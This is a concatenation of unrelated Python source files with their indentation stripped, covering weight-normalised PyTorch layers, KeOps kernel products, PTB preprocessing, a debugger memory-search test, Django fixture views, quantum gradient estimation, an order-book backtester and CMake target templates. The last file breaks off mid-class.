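#   poster.save('poster-with-qr.svg')  # svgutils SVGFigure supports save()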
|
31160
|
from contextlib import contextmanager
import torch
import torch.nn.functional as F
from torch.nn import Module, Parameter
from torch.nn import init
_WN_INIT_STDV = 0.05
_SMALL = 1e-10
_INIT_ENABLED = False
def is_init_enabled():
return _INIT_ENABLED
@contextmanager
def init_mode():
global _INIT_ENABLED
assert not _INIT_ENABLED
_INIT_ENABLED = True
yield
_INIT_ENABLED = False
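# Usage sketch (mirrors _test_data_dep_init below): run the first batch inside
# init_mode() so each DataDepInitModule executes its data-dependent _init pass,
# then call the module normally for standard forward passes.
#
#   m = WnDense(in_features=20, out_features=29)
#   with init_mode():
#       _ = m(first_batch)  # data-dependent initialization (runs under no_grad)
#   y = m(next_batch)       # standard forward pass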
class DataDepInitModule(Module):
"""
Module with data-dependent initialization
"""
def __init__(self):
super().__init__()
# self._wn_initialized = False
def _init(self, *args, **kwargs):
"""
Data-dependent initialization. Will be called on the first forward()
"""
raise NotImplementedError
def _forward(self, *args, **kwargs):
"""
The standard forward pass
"""
raise NotImplementedError
def forward(self, *args, **kwargs):
"""
Calls _init (with no_grad) if not initialized.
If initialized already, calls _forward.
"""
# assert self._wn_initialized == (not _INIT_ENABLED)
if _INIT_ENABLED: # not self._wn_initialized:
# self._wn_initialized = True
with torch.no_grad(): # no gradients for the init pass
return self._init(*args, **kwargs)
return self._forward(*args, **kwargs)
class Dense(DataDepInitModule):
def __init__(self, in_features, out_features, init_scale=1.0):
super().__init__()
self.in_features, self.out_features, self.init_scale = in_features, out_features, init_scale
self.w = Parameter(torch.Tensor(out_features, in_features))
self.b = Parameter(torch.Tensor(out_features))
init.normal_(self.w, 0, _WN_INIT_STDV)
init.zeros_(self.b)
def _init(self, x):
y = self._forward(x)
m = y.mean(dim=0)
s = self.init_scale / (y.std(dim=0) + _SMALL)
assert m.shape == s.shape == self.b.shape
self.w.copy_(self.w * s[:, None])
self.b.copy_(-m * s)
return self._forward(x)
def _forward(self, x):
return F.linear(x, self.w, self.b[None, :])
class WnDense(DataDepInitModule):
def __init__(self, in_features, out_features, init_scale=1.0):
super().__init__()
self.in_features, self.out_features, self.init_scale = in_features, out_features, init_scale
self.v = Parameter(torch.Tensor(out_features, in_features))
self.g = Parameter(torch.Tensor(out_features))
self.b = Parameter(torch.Tensor(out_features))
init.normal_(self.v, 0., _WN_INIT_STDV)
init.ones_(self.g)
init.zeros_(self.b)
def _init(self, x):
# calculate unnormalized activations
y_unnormalized = self._forward(x)
# set g and b so that activations are normalized
m = y_unnormalized.mean(dim=0)
s = self.init_scale / (y_unnormalized.std(dim=0) + _SMALL)
assert m.shape == s.shape == self.g.shape == self.b.shape
self.g.data.copy_(s)
self.b.data.sub_(m * s)
# forward pass again, now normalized
return self._forward(x)
def _forward(self, x):
(bs, in_features), out_features = x.shape, self.v.shape[0]
assert in_features == self.v.shape[1]
vnorm = self.v.norm(p=2, dim=1)
assert vnorm.shape == self.g.shape == self.b.shape
y = torch.addcmul(self.b[None, :], (self.g / vnorm)[None, :], x @ self.v.t())
# the line above is equivalent to: y = self.b[None, :] + (self.g / vnorm)[None, :] * (x @ self.v.t())
assert y.shape == (bs, out_features)
return y
def extra_repr(self):
return f'in_features={self.in_features}, out_features={self.out_features}, init_scale={self.init_scale}'
class _Nin(DataDepInitModule):
def __init__(self, in_features, out_features, wn: bool, init_scale: float):
super().__init__()
base_module = WnDense if wn else Dense
self.dense = base_module(in_features=in_features, out_features=out_features, init_scale=init_scale)
self.height, self.width = None, None
def _preprocess(self, x):
"""(b,c,h,w) -> (b*h*w,c)"""
B, C, H, W = x.shape
if self.height is None or self.width is None:
self.height, self.width = H, W
else:
assert self.height == H and self.width == W, 'nin input image shape changed!'
assert C == self.dense.in_features
return x.permute(0, 2, 3, 1).reshape(B * H * W, C)
def _postprocess(self, x):
"""(b*h*w,c) -> (b,c,h,w)"""
BHW, C = x.shape
out = x.reshape(-1, self.height, self.width, C).permute(0, 3, 1, 2)
assert out.shape[1:] == (self.dense.out_features, self.height, self.width)
return out
def _init(self, x):
return self._postprocess(self.dense._init(self._preprocess(x)))
def _forward(self, x):
return self._postprocess(self.dense._forward(self._preprocess(x)))
class Nin(_Nin):
def __init__(self, in_features, out_features, init_scale=1.0):
super().__init__(in_features=in_features, out_features=out_features, wn=False, init_scale=init_scale)
class WnNin(_Nin):
def __init__(self, in_features, out_features, init_scale=1.0):
super().__init__(in_features=in_features, out_features=out_features, wn=True, init_scale=init_scale)
class Conv2d(DataDepInitModule):
def __init__(self, in_channels, out_channels, kernel_size, stride=1,
padding=0, dilation=1, init_scale=1.0):
super().__init__()
self.in_channels, self.out_channels, self.kernel_size, self.stride, self.padding, self.dilation, self.init_scale = \
in_channels, out_channels, kernel_size, stride, padding, dilation, init_scale
self.w = Parameter(torch.Tensor(out_channels, in_channels, self.kernel_size, self.kernel_size))
self.b = Parameter(torch.Tensor(out_channels))
init.normal_(self.w, 0, _WN_INIT_STDV)
init.zeros_(self.b)
def _init(self, x):
# x.shape == (batch, channels, h, w)
y = self._forward(x) # (batch, out_channels, h, w)
m = y.transpose(0, 1).reshape(y.shape[1], -1).mean(dim=1) # out_channels
s = self.init_scale / (y.transpose(0, 1).reshape(y.shape[1], -1).std(dim=1) + _SMALL) # out_channels
self.w.copy_(self.w * s[:, None, None, None]) # (out, in, k, k) * (ou))
self.b.copy_(-m * s)
return self._forward(x)
def _forward(self, x):
return F.conv2d(x, self.w, self.b, self.stride, self.padding, self.dilation, 1)
class WnConv2d(DataDepInitModule):
def __init__(self, in_channels, out_channels, kernel_size, padding, init_scale=1.0):
super().__init__()
self.in_channels, self.out_channels, self.kernel_size, self.padding = in_channels, out_channels, kernel_size, padding
self.init_scale = init_scale
self.v = Parameter(torch.Tensor(out_channels, in_channels, self.kernel_size, self.kernel_size))
self.g = Parameter(torch.Tensor(out_channels))
self.b = Parameter(torch.Tensor(out_channels))
init.normal_(self.v, 0., _WN_INIT_STDV)
init.ones_(self.g)
init.zeros_(self.b)
def _init(self, x):
# calculate unnormalized activations
y_bchw = self._forward(x)
assert len(y_bchw.shape) == 4 and y_bchw.shape[:2] == (x.shape[0], self.out_channels)
# set g and b so that activations are normalized
y_c = y_bchw.transpose(0, 1).reshape(self.out_channels, -1)
m = y_c.mean(dim=1)
s = self.init_scale / (y_c.std(dim=1) + _SMALL)
assert m.shape == s.shape == self.g.shape == self.b.shape
self.g.data.copy_(s)
self.b.data.sub_(m * s)
# forward pass again, now normalized
return self._forward(x)
def _forward(self, x):
vnorm = self.v.view(self.out_channels, -1).norm(p=2, dim=1)
assert vnorm.shape == self.g.shape == self.b.shape
w = self.v * (self.g / (vnorm + _SMALL)).view(self.out_channels, 1, 1, 1)
return F.conv2d(x, w, self.b, padding=self.padding)
def extra_repr(self):
return f'in_channels={self.in_channels}, out_channels={self.out_channels}, kernel_size={self.kernel_size}, padding={self.padding}, init_scale={self.init_scale}'
class LearnedNorm(DataDepInitModule):
def __init__(self, shape, init_scale=1.0):
super().__init__()
self.init_scale = init_scale
self.g = Parameter(torch.ones(*shape))
self.b = Parameter(torch.zeros(*shape))
def _init(self, x, *, inverse):
assert not inverse
assert x.shape[1:] == self.g.shape == self.b.shape
m_init = x.mean(dim=0)
scale_init = self.init_scale / (x.std(dim=0) + _SMALL)
self.g.copy_(scale_init)
self.b.copy_(-m_init * scale_init)
return self._forward(x, inverse=inverse)
def get_gain(self):
return torch.clamp(self.g, min=1e-10)
def _forward(self, x, *, inverse):
"""
inverse == False to normalize; inverse == True to unnormalize
"""
assert x.shape[1:] == self.g.shape == self.b.shape
assert x.dtype == self.g.dtype == self.b.dtype
g = self.get_gain()
if not inverse:
return x * g[None] + self.b[None]
else:
return (x - self.b[None]) / g[None]
@torch.no_grad()
def _test_data_dep_init(m, x, init_scale, verbose=True, tol=1e-8, kwargs=None):
if kwargs is None:
kwargs = {}
with init_mode():
y_init = m(x, **kwargs)
y = m(x, **kwargs)
assert (y - y_init).abs().max() < tol, 'init pass output does not match normal forward pass'
y_outputs_flat = y.transpose(0, 1).reshape(y.shape[1], -1) # assumes axis 1 is the output axis
assert y_outputs_flat.mean(dim=1).abs().max() < tol, 'means wrong after normalization'
assert (y_outputs_flat.std(dim=1) - init_scale).abs().max() < tol, 'standard deviations wrong after normalization'
if verbose:
print('ok')
def test_dense():
bs = 128
in_features = 20
out_features = 29
init_scale = 3.14159
x = torch.randn(bs, in_features, dtype=torch.float64)
for module in [Dense, WnDense]:
m = module(in_features=in_features, out_features=out_features, init_scale=init_scale).double()
_test_data_dep_init(m, x, init_scale)
assert m(x).shape == (bs, out_features)
def test_conv2d():
bs = 128
in_channels = 20
out_channels = 29
height = 9
width = 11
init_scale = 3.14159
x = torch.randn(bs, in_channels, height, width, dtype=torch.float64)
for module in [Conv2d, WnConv2d]:
m = module(in_channels=in_channels, out_channels=out_channels, kernel_size=3, padding=1,
init_scale=init_scale).double()
_test_data_dep_init(m, x, init_scale)
assert m(x).shape == (bs, out_channels, height, width)
def test_learnednorm():
bs = 128
in_features = 20
init_scale = 3.14159
x = torch.rand(bs, in_features, dtype=torch.float64)
m = LearnedNorm(shape=(in_features,), init_scale=init_scale).double()
_test_data_dep_init(m, x, init_scale, kwargs={'inverse': False})
y = m(x, inverse=False)
assert y.shape == (bs, in_features)
assert torch.allclose(m(y, inverse=True), x), 'inverse failed'
|
31271
|
import warnings
from dataclasses import dataclass
from typing import List, Optional
import torch
from falkon.utils.stream_utils import sync_current_stream
from falkon.mmv_ops.utils import _get_gpu_info, create_output_mat, _start_wait_processes
from falkon.options import FalkonOptions, BaseOptions
from falkon.utils import decide_cuda
from falkon.utils.helpers import sizeof_dtype, calc_gpu_block_sizes
from pykeops.torch import Genred
@dataclass(frozen=True)
class ArgsFmmv:
X1: torch.Tensor
X2: torch.Tensor
v: torch.Tensor
other_vars: List[torch.Tensor]
out: torch.Tensor
gpu_ram: float
backend: str
function: callable
def _keops_dtype(dtype: torch.dtype) -> str:
"""Returns a string which represents the given data type.
The string representation is necessary for KeOps which doesn't
like type objects.
"""
if dtype == torch.float64:
return 'float64'
elif dtype == torch.float32:
return 'float32'
else:
raise NotImplementedError("Data type %s not recognized." % (dtype))
def _decide_backend(opt: BaseOptions, num_dim: int) -> str:
"""Switch between CPU and GPU backend for KeOps
"""
if not decide_cuda(opt):
return 'CPU'
else:
return 'GPU_1D'
def _estimate_split(N, M, D, T, R, ds):
"""Estimate the splits along dimensions N and M for a MVM to fit in memory
The operations consist of computing the product between a kernel
matrix (from a N*D and a M*D matrix) and a 'vector' of shape M*T
This typically requires storage of the input and output matrices,
which occupies (M + N)*(D + T) memory locations plus some intermediate
buffers to perform computations.
TODO: It is not clear how much intermediate memory KeOps requires;
the only thing that is certain is that it is quadratic in D.
For now we sidestep this issue by using a smaller R than what is
actually available in GPU memory.
This function calculates the split along N and M into blocks of size n*m
so that we can compute the kernel-vector product between such blocks
and still fit in GPU memory.
Parameters
-----------
- N : int
The first dimension of the kernel matrix
- M : int
The second dimension of the kernel matrix
- D : int
The data dimensionality
- T : int
The number of output columns
- R : float
The amount of memory available (in bytes)
- ds : int
The size in bytes of each element in the data matrices
(e.g. 4 if the data is in single precision).
Returns
--------
- n : int
The block size to be used along the first dimension
- m : int
The block size along the second dimension of the kernel
matrix
Raises
-------
RuntimeError
If the available memory `R` is insufficient to store even the smallest
possible input matrices. This may happen if `D` is very large since we
do not perform any splitting along `D`.
Notes
------
We find 'good' values of M, N such that
N*(D+T) + M*(D+T) <= R/ds
"""
R = R / ds
# We have a linear equation in two variables (N, M)
slope = -1
intercept = R / (D + T)
slack_points = 10
# We try to pick a point at the edges such that only one kind of split
# is necessary
if N < intercept - 1:
M = min(M, intercept + slope * N)
elif M < intercept - 1:
N = min(N, intercept + slope * M)
else:
# All points on the slope such that N, M > 0 are possible
N = intercept - slack_points - 1
M = intercept + slope * N
if N <= 0 or M <= 0:
raise RuntimeError(
"Insufficient available GPU "
"memory (available %.2fGB)" % (R * ds / 2 ** 30))
return int(N), int(M)
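# Worked example (illustrative numbers only): with R = 1 GiB of usable memory,
# single precision (ds = 4), D = 100 and T = 1, the element budget is
# R/ds ~= 2.68e8, so N*(D+T) + M*(D+T) <= R/ds constrains N + M to roughly
# 2.68e8 / 101 ~= 2.7e6 rows shared between the two blocks.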
def _single_gpu_method(proc_idx, queue, device_id):
a: ArgsFmmv = queue.get()
backend = a.backend
X1 = a.X1
X2 = a.X2
v = a.v
oout = a.out
other_vars = a.other_vars
fn = a.function
R = a.gpu_ram
N, D = X1.shape
M = X2.shape[0]
T = v.shape[1]
device = torch.device(f"cuda:{device_id}")
# Second round of subdivision (only if necessary due to RAM constraints)
n, m = _estimate_split(N, M, D, T, R, sizeof_dtype(X1.dtype))
other_vars_dev = [ov.to(device, copy=False) for ov in other_vars]
out_ic = oout.device.index == device_id
# Process the two rounds of splitting with a nested loop.
with torch.cuda.device(device_id):
for mi in range(0, M, m):
ml = min(m, M - mi)
if ml != M and mi > 0: # Then we must create a temporary output array
out = torch.empty_like(oout)
else:
out = oout
cX2 = X2[mi:mi + ml, :].to(device, copy=False)
cv = v[mi:mi + ml, :].to(device, copy=False)
for ni in range(0, N, n):
nl = min(n, N - ni)
cX1 = X1[ni:ni + nl, :].to(device, copy=False)
cout = out[ni: ni + nl, :].to(device, copy=False)
variables = [cX1, cX2, cv] + other_vars_dev
fn(*variables, out=cout, device_id=device_id, backend=backend)
if not out_ic:
out[ni: ni + nl, :].copy_(cout)
if ml != M and mi > 0:
oout.add_(out)
return oout
def run_keops_mmv(X1: torch.Tensor,
X2: torch.Tensor,
v: torch.Tensor,
other_vars: List[torch.Tensor],
out: Optional[torch.Tensor],
formula: str,
aliases: List[str],
axis: int,
reduction: str = 'Sum',
opt: Optional[FalkonOptions] = None) -> torch.Tensor:
if opt is None:
opt = FalkonOptions()
# Choose backend
N, D = X1.shape
T = v.shape[1]
backend = _decide_backend(opt, D)
dtype = _keops_dtype(X1.dtype)
data_devs = [X1.device, X2.device, v.device]
if any([ddev.type == 'cuda' for ddev in data_devs]) and (not backend.startswith("GPU")):
warnings.warn("KeOps backend was chosen to be CPU, but GPU input tensors found. "
"Defaulting to 'GPU_1D' backend. To force usage of the CPU backend, "
"please pass CPU tensors; to avoid this warning if the GPU backend is "
"desired, check your options (i.e. set 'use_cpu=False').")
backend = "GPU_1D"
differentiable = any(
[X1.requires_grad, X2.requires_grad, v.requires_grad] +
[o.requires_grad for o in other_vars]
)
if differentiable:
from falkon.kernels.tiling_red import TilingGenred
fn = TilingGenred(formula, aliases, reduction_op='Sum', axis=1, dtype=dtype,
dtype_acc="auto", sum_scheme="auto", opt=opt)
return fn(X1, X2, v, *other_vars, out=out, backend=backend)
# Define formula wrapper
fn = Genred(formula, aliases,
reduction_op=reduction, axis=axis,
dtype=dtype, dtype_acc=opt.keops_acc_dtype,
sum_scheme=opt.keops_sum_scheme)
comp_dev_type = backend[:3].lower().replace('gpu', 'cuda') # 'cpu' or 'cuda'
out = create_output_mat(out, data_devs, is_sparse=False, shape=(N, T), dtype=X1.dtype,
comp_dev_type=comp_dev_type, other_mat=X1, output_stride="C")
if comp_dev_type == 'cpu' and all([ddev.type == 'cpu' for ddev in data_devs]): # incore CPU
variables = [X1, X2, v] + other_vars
out = fn(*variables, out=out, backend=backend)
elif comp_dev_type == 'cuda' and all([ddev.type == 'cuda' for ddev in data_devs]): # incore CUDA
variables = [X1, X2, v] + other_vars
device = data_devs[0]
with torch.cuda.device(device):
sync_current_stream(device)
out = fn(*variables, out=out, backend=backend)
else: # Out of core
# slack is high due to imprecise memory usage estimates for keops
gpu_info = _get_gpu_info(opt, slack=opt.keops_memory_slack)
block_sizes = calc_gpu_block_sizes(gpu_info, N)
# Create queues
args = [] # Arguments passed to each subprocess
for i, g in enumerate(gpu_info):
# First round of subdivision
bwidth = block_sizes[i + 1] - block_sizes[i]
if bwidth <= 0:
continue
args.append((ArgsFmmv(
X1=X1.narrow(0, block_sizes[i], bwidth),
X2=X2,
v=v,
out=out.narrow(0, block_sizes[i], bwidth),
other_vars=other_vars,
function=fn,
backend=backend,
gpu_ram=g.usable_memory
), g.Id))
_start_wait_processes(_single_gpu_method, args)
return out
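# Usage sketch (illustrative formula only, not falkon's exact kernel definition):
# a Gaussian kernel-vector product K(X1, X2) @ v could be expressed for KeOps as
#
#   formula = 'Exp(-SqDist(x1, x2)) * v'
#   aliases = ['x1 = Vi(%d)' % D, 'x2 = Vj(%d)' % D, 'v = Vj(%d)' % T]
#   out = run_keops_mmv(X1, X2, v, [], None, formula, aliases, axis=1)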
|
31273
|
import codecs
import sys
RAW_DATA = "../data/ptb/ptb.train.txt"
VOCAB = "data/ptb.vocab"
OUTPUT_DATA = "data/ptb.train"
# Read the vocabulary file and build the word-to-id mapping
with codecs.open(VOCAB, "r", "utf-8") as f_vocab:
vocab = [w.strip() for w in f_vocab.readlines()]
word_to_id = {k: v for (k, v) in zip(vocab, range(len(vocab)))}
# Replace deleted low-frequency words with <unk>
def get_id(word):
return word_to_id[word] if word in word_to_id else word_to_id["<unk>"]
fin = codecs.open(RAW_DATA, "r", "utf-8")
fout = codecs.open(OUTPUT_DATA, 'w', 'utf-8')
for line in fin:
words = line.strip().split() + ["<eos>"]  # read the words and append the <eos> end-of-sentence token
# Replace each word with its id in the vocabulary
out_line = ' '.join([str(get_id(w)) for w in words]) + '\n'
fout.write(out_line)
fin.close()
fout.close()
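# The resulting ptb.train file holds one line per sentence: a space-separated
# list of vocabulary ids ending with the id assigned to <eos>.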
|
31317
|
from utils import *
car = get_car()
# Positive cases. Can't print the result because the address may change
# from run to run.
#
dbgscript.search_memory(car['name'].address-16, 100, b'FooCar', 1)
dbgscript.search_memory(car['name'].address-16, 100, b'FooCar', 2)
# Negative cases.
#
# 4 is not a multiple of the pattern length.
#
try:
dbgscript.search_memory(car['name'].address-16, 100, b'FooCar', 4)
except ValueError:
print('Swallowed ValueError')
# Try a non-existent pattern.
#
try:
dbgscript.search_memory(car['name'].address-16, 100, b'AbcDefAb', 4)
except LookupError:
print('Swallowed LookupError')
# 3 is a multiple of the pat. len, but the pattern won't be found on a
# 3 byte granularity.
#
try:
dbgscript.search_memory(car['name'].address-16, 100, b'FooCar', 3)
except LookupError:
print('Swallowed LookupError')
|
31356
|
from django.contrib import messages
from django.http import HttpResponseRedirect
from django.utils.functional import cached_property
from django.utils.translation import ugettext as _
from django.utils.translation import ugettext_noop, ugettext_lazy
from couchdbkit import ResourceNotFound
from memoized import memoized
from corehq.apps.fixtures.dispatcher import FixtureInterfaceDispatcher
from corehq.apps.fixtures.models import FixtureDataType, _id_from_doc
from corehq.apps.fixtures.views import FixtureViewMixIn, fixtures_home
from corehq.apps.reports.filters.base import BaseSingleOptionFilter
from corehq.apps.reports.generic import GenericReportView, GenericTabularReport
class FixtureInterface(FixtureViewMixIn, GenericReportView):
base_template = 'fixtures/fixtures_base.html'
asynchronous = False
dispatcher = FixtureInterfaceDispatcher
exportable = False
needs_filters = False
class FixtureSelectFilter(BaseSingleOptionFilter):
slug = "table_id"
label = ""
placeholder = "place"
default_text = ugettext_lazy("Select a Table")
@property
def selected(self):
# ko won't display default selected-value as it should, display default_text instead
return ""
@property
@memoized
def fixtures(self):
return sorted(FixtureDataType.by_domain(self.domain), key=lambda t: t.tag.lower())
@property
@memoized
def options(self):
return [(_id_from_doc(f), f.tag) for f in self.fixtures]
class FixtureViewInterface(GenericTabularReport, FixtureInterface):
name = ugettext_noop("View Tables")
slug = "view_lookup_tables"
report_template_path = 'fixtures/view_table.html'
fields = ['corehq.apps.fixtures.interface.FixtureSelectFilter']
@property
def view_response(self):
if not self.has_tables():
messages.info(self.request, _("You don't have any tables defined yet - create tables to view them."))
return HttpResponseRedirect(fixtures_home(self.domain))
else:
return super(FixtureViewInterface, self).view_response
@property
def report_context(self):
assert self.has_tables()
if not self.request.GET.get("table_id", None):
return {"table_not_selected": True}
try:
context = super(FixtureViewInterface, self).report_context
except ResourceNotFound:
return {"table_not_selected": True}
# Build javascript options for DataTables
report_table = context['report_table']
headers = report_table.get('headers')
data_tables_options = {
'slug': self.context['report']['slug'],
'defaultRows': report_table.get('default_rows', 10),
'startAtRowNum': report_table.get('start_at_row', 0),
'showAllRowsOption': report_table.get('show_all_rows'),
'autoWidth': headers.auto_width,
}
if headers.render_aoColumns:
data_tables_options.update({
'aoColumns': headers.render_aoColumns,
})
if headers.custom_sort:
data_tables_options.update({
'customSort': headers.custom_sort,
})
pagination = context['report_table'].get('pagination', {})
if pagination.get('is_on'):
data_tables_options.update({
'ajaxSource': pagination.get('source'),
'ajaxParams': pagination.get('params'),
})
left_col = context['report_table'].get('left_col', {})
if left_col.get('is_fixed'):
data_tables_options.update({
'fixColumns': True,
'fixColsNumLeft': left_col['fixed'].get('num'),
'fixColsWidth': left_col['fixed'].get('width'),
})
context.update({
"selected_table": self.table.get("table_id", ""),
'data_tables_options': data_tables_options,
})
if self.lookup_table:
context.update({
"table_description": self.lookup_table.description,
})
return context
@memoized
def has_tables(self):
return bool(list(FixtureDataType.by_domain(self.domain)))
@property
@memoized
def table(self):
from corehq.apps.fixtures.views import data_table
if self.has_tables() and self.request.GET.get("table_id", None):
return data_table(self.request, self.domain)
else:
return {"headers": None, "rows": None}
@cached_property
def lookup_table(self):
if self.has_tables() and self.request.GET.get("table_id", None):
return FixtureDataType.get(self.request.GET['table_id'])
return None
@property
def headers(self):
return self.table["headers"]
@property
def rows(self):
return self.table["rows"]
class FixtureEditInterface(FixtureInterface):
name = ugettext_noop("Manage Tables")
slug = "edit_lookup_tables"
report_template_path = 'fixtures/manage_tables.html'
@property
def report_context(self):
context = super(FixtureEditInterface, self).report_context
context.update(types=self.data_types)
return context
@property
@memoized
def data_types(self):
return list(FixtureDataType.by_domain(self.domain))
|
31372
|
import NLQ_Preprocessor as preProcessor
import NLP_Engine as nlpEngine
import NLQ_Interpreter as interpreter
import nltk
import time
class NLQ_Chunker:
def __init__(self):
self.preprocessor = preProcessor.PreProcessor()
self.nlp_engine = nlpEngine.NLP_Engine()
self.interpreter = interpreter.Interpreter()
def chunk_a_sentence(self, sentence):
sentence = self.preprocessor.replace_special_words(sentence)['sentence']
# this method returns an object {'sentence': xxxx, 'origional_sentence': xxxx}
tokens = self.preprocessor.filter_tokens_result(nltk.word_tokenize(sentence))
tags = self.preprocessor.recify_tagging_result(nltk.pos_tag(tokens))
# get the bigram of the sentence, which tells subjects/objects from other elements
bigram = self.nlp_engine.bigram_chunk_sentence(tags)
final_gram = self.nlp_engine.top_pattern_recognizer(bigram) # the fully processed tree that contains all the info needed.
# final_gram.draw()
return self.interpreter.main_tree_navigator(final_gram)
#
#
#
#
#
# chunker = NLQ_Chunker()
# sentence = input('Ask: ')
# start = time.time()
# chunker.chunk_a_sentence(sentence)
# print('took ' , time.time() - start, 'seconds')
|
31427
|
import numpy as np
from pyquil import Program
from pyquil.api import QuantumComputer, get_qc
from grove.alpha.jordan_gradient.gradient_utils import (binary_float_to_decimal_float,
measurements_to_bf)
from grove.alpha.phaseestimation.phase_estimation import phase_estimation
def gradient_program(f_h: float, precision: int) -> Program:
"""
Gradient estimation via Jordan's algorithm (10.1103/PhysRevLett.95.050501).
:param f_h: Oracle output at perturbation h.
:param precision: Bit precision of gradient.
:return: Quil program to estimate gradient of f.
"""
# encode oracle values into phase
phase_factor = np.exp(1.0j * 2 * np.pi * abs(f_h))
U = np.array([[phase_factor, 0],
[0, phase_factor]])
p_gradient = phase_estimation(U, precision)
return p_gradient
def estimate_gradient(f_h: float, precision: int,
gradient_max: int = 1,
n_measurements: int = 50,
qc: QuantumComputer = None) -> float:
"""
Estimate the gradient using function evaluation at perturbation, h.
:param f_h: Oracle output at perturbation h.
:param precision: Bit precision of gradient.
:param gradient_max: Order-of-magnitude estimate of the largest gradient value.
:param n_measurements: Number of times to measure system.
:param qc: The QuantumComputer object.
:return: Decimal estimate of gradient.
"""
# scale f_h by range of values gradient can take on
f_h *= 1. / gradient_max
# generate gradient program
perturbation_sign = np.sign(f_h)
p_gradient = gradient_program(f_h, precision)
# run gradient program
if qc is None:
qc = get_qc(f"{len(p_gradient.get_qubits())}q-qvm")
p_gradient.wrap_in_numshots_loop(n_measurements)
executable = qc.compiler.native_quil_to_executable(p_gradient)
measurements = qc.run(executable)
# summarize measurements
bf_estimate = perturbation_sign * measurements_to_bf(measurements)
bf_explicit = '{0:.16f}'.format(bf_estimate)
deci_estimate = binary_float_to_decimal_float(bf_explicit)
# rescale gradient
deci_estimate *= gradient_max
return deci_estimate
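# Usage sketch (hypothetical oracle value): estimate a gradient of roughly 0.25
# from a single perturbation evaluation, using 3 bits of precision on the QVM.
#
#   gradient = estimate_gradient(f_h=0.25, precision=3, n_measurements=50)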
|
31428
|
from torch import randn
from torch.nn import Conv2d
from backpack import extend
def data_conv2d(device="cpu"):
N, Cin, Hin, Win = 100, 10, 32, 32
Cout, KernelH, KernelW = 25, 5, 5
X = randn(N, Cin, Hin, Win, requires_grad=True, device=device)
module = extend(Conv2d(Cin, Cout, (KernelH, KernelW))).to(device=device)
out = module(X)
Hout = Hin - (KernelH - 1)
Wout = Win - (KernelW - 1)
vin = randn(N, Cout, Hout, Wout, device=device)
vout = randn(N, Cin, Hin, Win, device=device)
return {
"X": X,
"module": module,
"output": out,
"vout_ag": vout,
"vout_bp": vout.view(N, -1, 1),
"vin_ag": vin,
"vin_bp": vin.view(N, -1, 1),
}
|
31460
|
import os
import json
from contextlib import suppress
from OrderBook import *
from Signal import Signal
class OrderBookContainer:
def __init__(self, path_to_file):
self.order_books = []
self.trades = []
self.cur_directory = os.path.dirname(path_to_file)
self.f_name = os.path.split(path_to_file)[1]
with open(path_to_file, 'r') as infile:
for line in infile:
ob = json.loads(line)
self.order_books.append(OrderBook(ob))
def create_training_dataset(self):
if not self.order_books:
return
output_dir = os.path.join(self.cur_directory, 'Datasets')
with suppress(OSError):
os.mkdir(output_dir)
dataset_file_path = os.path.splitext(os.path.join(output_dir, self.f_name))[0] + '.ds'
best_prices = self.order_books[0].best_prices
mid_price = (best_prices['buy_price'] + best_prices['sell_price']) / 2
with open(dataset_file_path, 'w') as json_file:
for idx, ob in enumerate(self.order_books[0:-1]):
next_best_prices = self.order_books[idx + 1].best_prices
next_mid_price = (next_best_prices['buy_price'] + next_best_prices['sell_price']) / 2
if mid_price != next_mid_price:
direction = 0 if mid_price > next_mid_price else 1
json.dump({'volumes': ob.volumes, 'direction': direction}, json_file)
json_file.write('\n')
mid_price = next_mid_price
def _open_position(self, best_prices, signal):
self.trades.append({})
self.trades[-1]['direction'] = signal
self.trades[-1]['open_time'] = best_prices['time']
if signal == Signal.BUY:
self.trades[-1]['open_price'] = best_prices['buy_price']
elif signal == Signal.SELL:
self.trades[-1]['open_price'] = best_prices['sell_price']
def _close_position(self, best_prices):
self.trades[-1]['close_time'] = best_prices['time']
if self.trades[-1]['direction'] == Signal.BUY:
self.trades[-1]['close_price'] = best_prices['sell_price']
elif self.trades[-1]['direction'] == Signal.SELL:
self.trades[-1]['close_price'] = best_prices['buy_price']
def _reverse_position(self, best_prices, signal):
self._close_position(best_prices)
self._open_position(best_prices, signal)
def backtest(self, generator, threshold):
self.trades = []
for ob in self.order_books[0:-1]:
best_prices = ob.best_prices
signal = generator(ob.volumes, threshold)
if not self.trades and signal != Signal.WAIT:
self._open_position(best_prices, signal)
elif signal != self.trades[-1]['direction'] and signal != Signal.WAIT:
self._reverse_position(best_prices, signal)
if not self.trades:
best_prices = self.order_books[-1].best_prices
self._close_position(best_prices)
return self.trades
def backtest_n(self, generator, ffnn, threshold):
self.trades = []
for ob in self.order_books[0:-1]:
best_prices = ob.best_prices
signal = generator(ffnn, ob.volumes, threshold)
if not self.trades and signal != Signal.WAIT:
self._open_position(best_prices, signal)
elif signal != self.trades[-1]['direction'] and signal != Signal.WAIT:
self._reverse_position(best_prices, signal)
if not self.trades:
best_prices = self.order_books[-1].best_prices
self._close_position(best_prices)
return self.trades
|
31467
|
import os
from biicode.common.model.brl.block_cell_name import BlockCellName
from biicode.common.model.bii_type import BiiType
def _binary_name(name):
return os.path.splitext(name.replace("/", "_"))[0]
class CPPTarget(object):
def __init__(self):
self.files = set() # The source files in this target
self.dep_targets = set() # set of BlockNames, to which this target depends
self.system = set() # These are the included system headers (stdio.h, math.h...)
self.include_paths = {} # Initially {Order#: BlockNamePath}. At the end [FullPaths]
@property
def dep_names(self):
return sorted([_binary_name(d) for d in self.dep_targets])
class CPPLibTarget(CPPTarget):
template = """
# LIBRARY {library_name} ##################################
# with interface {library_name}_interface
# Source code files of the library
SET(BII_LIB_SRC {files})
# STATIC by default if empty, or SHARED
SET(BII_LIB_TYPE {type})
# Dependencies to other libraries (user2_block2, user3_blockX)
SET(BII_LIB_DEPS {library_name}_interface {deps})
# System included headers
SET(BII_LIB_SYSTEM_HEADERS {system})
# Required include paths
SET(BII_LIB_INCLUDE_PATHS {paths})
"""
def __init__(self, block_name):
CPPTarget.__init__(self)
self.name = _binary_name(block_name)
self.type = "" # By default, libs are static
def dumps(self):
content = CPPLibTarget.template.format(library_name=self.name,
files="\n\t\t\t".join(sorted(self.files)),
type=self.type,
deps=" ".join(self.dep_names),
system=" ".join(sorted(self.system)),
paths="\n\t\t\t\t\t".join(self.include_paths))
return content
class CPPExeTarget(CPPTarget):
template = """
# EXECUTABLE {exe_name} ##################################
SET(BII_{exe_name}_SRC {files})
SET(BII_{exe_name}_DEPS {block_interface} {deps})
# System included headers
SET(BII_{exe_name}_SYSTEM_HEADERS {system})
# Required include paths
SET(BII_{exe_name}_INCLUDE_PATHS {paths})
"""
def __init__(self, main):
CPPTarget.__init__(self)
assert isinstance(main, BlockCellName)
